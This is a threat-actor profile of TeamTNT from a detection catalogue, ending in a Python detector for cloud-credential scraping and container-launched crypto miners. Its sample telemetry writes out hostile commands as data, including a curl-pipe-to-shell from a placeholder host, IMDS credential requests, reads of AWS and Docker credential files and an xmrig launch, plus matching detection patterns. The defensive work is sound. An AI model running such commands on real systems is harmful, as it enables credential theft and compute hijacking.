Clankerusecase
Threat-actor profile

🌐 TeamTNT

TeamTNT is a tracked threat actor in the Clankerusecase corpus. Alignment: unknown. Primary motivation: not recorded in the corpus (the public reporting cited below describes cryptomining, i.e. financially motivated activity). We map 14 detection use cases to this actor across 56 MITRE ATT&CK techniques; 0 threat-intel articles cite them and 0 IOCs are linked.

MITRE ATT&CK group: G0139

14 use cases · 0 articles · 56 techniques · 0 IOCs

About this actor (MITRE)

[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020) (Citation: Lacework TeamTNT May 2021) (Citation: Intezer TeamTNT September 2020) (Citation: Cado Security TeamTNT Worm August 2020) (Citation: Unit 42 Hildegard Malware) (Citation: Trend Micro TeamTNT) (Citation: ATT TeamTNT Chimaera September

Known aliases

TeamTNT

Top techniques

All other tracked techniques

T1021.004 · SSH
T1027.002 · Software Packing
T1027.013 · Encrypted/Encoded File
T1036 · Masquerading
T1036.005 · Match Legitimate Resource Name or Location
T1046 · Network Service Discovery
T1048 · Exfiltration Over Alternative Protocol
T1049 · System Network Connections Discovery
T1057 · Process Discovery
T1059.001 · PowerShell
T1059.003 · Windows Command Shell
T1059.004 · Unix Shell
T1059.009 · Cloud API
T1059.013 · Container CLI/API
T1070.003 · Clear Command History
T1070.004 · File Deletion
T1071 · Application Layer Protocol
T1071.001 · Web Protocols
T1074.001 · Local Data Staging
T1082 · System Information Discovery
T1083 · File and Directory Discovery
T1098.004 · SSH Authorized Keys
T1102 · Web Service
T1105 · Ingress Tool Transfer
T1120 · Peripheral Device Discovery
T1133 · External Remote Services
T1136.001 · Local Account
T1140 · Deobfuscate/Decode Files or Information
T1204.003 · Malicious Image
T1219 · Remote Access Tools
T1222.002 · Linux and Mac Permissions
T1496.001 · Compute Hijacking
T1518.001 · Security Software Discovery
T1543.002 · Systemd Service
T1543.003 · Windows Service
T1547.001 · Registry Run Keys / Startup Folder
T1552.001 · Credentials In Files
T1552.004 · Private Keys
T1552.005 · Cloud Instance Metadata API
T1569.003 · Systemctl
T1583.001 · Domains
T1587.001 · Malware
T1595.001 · Scanning IP Blocks
T1595.002 · Vulnerability Scanning
T1608.001 · Upload Malware
T1609 · Container Administration Command
T1610 · Deploy Container
T1611 · Escape to Host
T1613 · Container and Resource Discovery
T1680 · Local Storage Discovery
T1685 · Disable or Modify Tools
T1685.006 · Clear Linux or Mac System Logs
T1686 · Disable or Modify System Firewall

Detection use cases (14)

TeamTNT cloud-credential & IMDS scrape from Linux shell (Chimaera / Black-T pattern) [AI · profile]
TeamTNT container escape / Docker-API abuse spawning XMRig (Hildegard / Kinsing-style miner deploy) [AI · profile]
Auth-Bypass on Public-Facing Service → Post-Exploit Action on Same Host (≤10 min) [MITRE match]
Brand-Impersonation Domain Fetch Followed by User-Context Loader Within 10 Minutes [MITRE match]
Cross-category credential-store enumeration with rapid egress to anonymizing tunnel/CDN [MITRE match]
Cross-Platform ClickFix Paste-to-Pipe Loader (UI-Parent Shell with Decode-and-Execute Payload) [MITRE match]
Developer/Data-tooling Daemon Spawns Shell Child Seconds After POST to Runner/Exec Endpoint [MITRE match]
Edge-service post-exploitation chain: internet-facing daemon → child shell or token redemption within 10 min of external request [MITRE match]
Internet-Facing Service Process Spawning Unix Shell or Ingress-Tool LOLBin (Edge Zero-Day Post-Exploit) [MITRE match]
Internet-facing service process spawns shell/LOLBin within minutes of public inbound connection — post-RCE command execution [MITRE match]
Language-runtime server (node/python/java) spawns OS shell shortly after inbound request — eval / sandbox-escape exploitation chain [MITRE match]
Linux LPE chain — anomalous algif_aead/esp4/esp6/rxrpc kernel-module load followed by same-user root transition [MITRE match]
Low-Code / AI Workflow Runtime Sandbox-Escape — Server Process Spawns Shell + Public Egress [MITRE match]
Non-Browser Process Reads Browser Credential / Cookie SQLite Then Egresses to Public Destination Within 10 Minutes [MITRE match]
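The two TeamTNT-specific use cases above (IMDS/cloud-credential scrape from a shell, and Docker-API abuse spawning XMRig) are listed by name only. What follows is an added example, not code from the Clankerusecase corpus or from any of the cited reports: a small Python detector that runs both patterns over constructed process-start events. The tab-separated event format, the field names, the pids and the hostnames are assumptions made for this example; the IMDS addresses and credential paths are the documented AWS, GCP and Azure endpoints, and the ATT&CK IDs are the ones in this page's technique list. A real deployment would feed it auditd or eBPF exec events instead of the sample string.

```python
import re

# Constructed sample process-start telemetry (not real TeamTNT data). One event per
# line, tab-separated: ts, pid, ppid, user, comm, cmdline. The format is a
# hypothetical stand-in for auditd/eBPF exec events.
SAMPLE_EVENTS = (
    "1\t1200\t1\troot\tcloud-init\t/usr/bin/python3 /usr/bin/cloud-init modules\n"
    "2\t1201\t1200\troot\tcurl\tcurl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/\n"
    "3\t3000\t2999\troot\tcontainerd-shim-runc-v2\tcontainerd-shim-runc-v2 -namespace moby -id abc123\n"
    "4\t3001\t3000\troot\tsh\t/bin/sh -c \"curl -fsSL http://example.invalid/setup.sh | sh\"\n"
    "5\t3002\t3001\troot\tcurl\tcurl -fsSL http://example.invalid/setup.sh\n"
    "6\t3003\t3001\troot\tsh\tsh\n"
    "7\t3004\t3003\troot\tcurl\tcurl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/\n"
    "8\t3005\t3003\troot\tcat\tcat /root/.aws/credentials /root/.docker/config.json\n"
    "9\t3006\t3003\troot\txmrig\t/tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level 0\n"
    "10\t4000\t3999\talice\tbash\tbash\n"
    "11\t4001\t4000\talice\tcurl\tcurl http://169.254.169.254/latest/meta-data/instance-id\n"
)

IMDS_HOSTS = ("169.254.169.254", "fd00:ec2::254", "metadata.google.internal")
# Documented credential-returning IMDS paths on AWS, GCP and Azure.
CRED_PATH_RE = re.compile(r"iam/security-credentials|service-accounts/[^ ]*/token|metadata/identity/oauth2/token")
CRED_FILE_RE = re.compile(r"\.aws/credentials|\.docker/config\.json|\.kube/config")
MINER_RE = re.compile(r"xmrig|stratum\+tcp://|--donate-level|randomx|cryptonight", re.I)
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
CONTAINER_RUNTIMES = {"containerd-shim-runc-v2", "containerd-shim", "dockerd", "runc"}


def parse_events(text):
    """Parse the sample format into {pid: event}."""
    events = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, user, comm, cmdline = line.split("\t", 5)
        events[int(pid)] = {"ts": int(ts), "pid": int(pid), "ppid": int(ppid),
                            "user": user, "comm": comm, "cmdline": cmdline}
    return events


def ancestors(events, pid, max_depth=8):
    """comm names of pid's ancestors, nearest first; stops where the ppid chain leaves our data."""
    chain, cur = [], events.get(pid)
    while cur is not None and len(chain) < max_depth:
        parent = events.get(cur["ppid"])
        if parent is None:
            break
        chain.append(parent["comm"])
        cur = parent
    return chain


def detect_cloud_credential_scrape(events):
    """Use case 1: shell-spawned IMDS credential request (T1552.005) or shell-spawned
    read of a cloud/container credential file (T1552.001). Requiring the direct parent
    to be a shell keeps cloud-init and instance agents, which also query IMDS, quiet."""
    hits = []
    for ev in sorted(events.values(), key=lambda e: e["ts"]):
        parents = ancestors(events, ev["pid"])
        if not parents or parents[0] not in SHELLS:
            continue
        cmd = ev["cmdline"]
        if ev["comm"] in DOWNLOADERS and any(h in cmd for h in IMDS_HOSTS) and CRED_PATH_RE.search(cmd):
            hits.append((ev["pid"], "T1552.005", "shell-spawned IMDS credential request"))
        elif ev["comm"] not in SHELLS and CRED_FILE_RE.search(cmd):
            hits.append((ev["pid"], "T1552.001", "shell-spawned read of credential file"))
    return hits


def detect_container_miner(events):
    """Use case 2: miner-looking process whose ancestry contains both a shell and a
    container runtime, i.e. a shell obtained through the Docker API or a container
    escape launching XMRig (T1609/T1610 leading to T1496.001)."""
    hits = []
    for ev in sorted(events.values(), key=lambda e: e["ts"]):
        if not MINER_RE.search(ev["cmdline"]):
            continue
        parents = ancestors(events, ev["pid"])
        if any(p in SHELLS for p in parents) and any(p in CONTAINER_RUNTIMES for p in parents):
            hits.append((ev["pid"], "T1496.001", "miner launched from shell under container runtime"))
    return hits


def run(text=SAMPLE_EVENTS):
    """Run both detections over the sample; returns (pid, technique, reason) tuples."""
    events = parse_events(text)
    return detect_cloud_credential_scrape(events) + detect_container_miner(events)


if __name__ == "__main__":
    for pid, technique, why in run():
        print(pid, technique, why)
```

On the sample, pids 3004, 3005 and 3006 fire and the cloud-init IMDS call (1201) and the interactive `instance-id` lookup (4001) do not. The parent-is-a-shell requirement is the trade-off to understand: a scraper started directly from a cron entry or a systemd unit (T1543.002 is in the list above) bypasses it, so a second rule keyed on those parents is needed in practice. IMDSv2's session-token requirement does not change the match, since the rule keys on the URL path rather than the request headers.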